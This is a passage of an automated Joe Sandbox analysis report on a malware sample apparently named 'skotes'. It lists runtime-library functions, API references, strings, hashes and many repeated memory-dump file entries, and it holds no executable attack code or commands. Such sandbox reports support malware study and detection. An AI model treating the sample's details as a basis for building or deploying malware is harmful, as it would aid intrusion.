                                                                                                                                                                                                                                                                • Instruction ID: fd5ac07e277c8f56ceab9129420cde4090b8ce4dfa7ee2d736ca56728e076570
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42119131101105ABDB15DF69C985BAA73A5AF25364B14C25BFD079F302DB71DD01CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • kernel32.dll, xrefs: 00ABD04C
                                                                                                                                                                                                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00ABD03B
                                                                                                                                                                                                                                                                • SleepConditionVariableCS, xrefs: 00ABD05D
                                                                                                                                                                                                                                                                • WakeAllConditionVariable, xrefs: 00ABD069
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ___scrt_fastfail
                                                                                                                                                                                                                                                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 2964418898-3242537097
                                                                                                                                                                                                                                                                • Opcode ID: bba2fa80a67b488d405a278f15409ae4c3528dd73627fc130c41e0466cd99a80
                                                                                                                                                                                                                                                                • Instruction ID: e3ab0c5c4a4c0a75f6dc134c4aef661fb9db5e4f96c61a8a240f7b27b45ddb3e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bba2fa80a67b488d405a278f15409ae4c3528dd73627fc130c41e0466cd99a80
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0301D661AC7B11A9FA313BB55F01EAB25CC9F52B84F091510BE05F75A4EEA0DC016DB1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00AE4C98
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00AE4D5E
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00AE4DCA
                                                                                                                                                                                                                                                                  • Part of subcall function 00ADB04B: RtlAllocateHeap.NTDLL(00000000,61AD01A7,?,?,00ABD3FC,61AD01A7,?,00AB7A8B,?,?,?,?,?,?,00AA7465,?), ref: 00ADB07E
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00AE4DD3
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00AE4DF6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1423051803-0
                                                                                                                                                                                                                                                                • Opcode ID: 114c850bd6ac0f486fd2398bbd217535ba2e07443db582b528e3882f517478e3
                                                                                                                                                                                                                                                                • Instruction ID: 5791255feef5ee82840da4846706fffbd7d4cbccff9d8f2c71af2d450d557d0d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 114c850bd6ac0f486fd2398bbd217535ba2e07443db582b528e3882f517478e3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A151D472600256AFEB219F66DD81FBB37ADDF88750F264629FD05A7241EB30DC1096A0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 00ACE91E
                                                                                                                                                                                                                                                                • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00ACE926
                                                                                                                                                                                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00ACE950
                                                                                                                                                                                                                                                                • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00ACE959
                                                                                                                                                                                                                                                                • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00ACE9DC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 512098550-0
                                                                                                                                                                                                                                                                • Opcode ID: 5a235fb3421a6eb8444ec35ee5bd067c73c5ba5a0b27167982f58096158ec49f
                                                                                                                                                                                                                                                                • Instruction ID: f832ba53d1a4a6486a1bb1b0087c13799cf1f1d62b9fb521deeafab57f2ba2b4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a235fb3421a6eb8444ec35ee5bd067c73c5ba5a0b27167982f58096158ec49f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8414A35A00219EFCB09DFA4C954BADBBB6FF88310F05815DE946A7391CB34AE01CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00ABECED
                                                                                                                                                                                                                                                                • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00ABED17
                                                                                                                                                                                                                                                                  • Part of subcall function 00ABF3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00ABF3FA
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00ABED53
                                                                                                                                                                                                                                                                • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00ABED94
                                                                                                                                                                                                                                                                • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00ABEDC6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
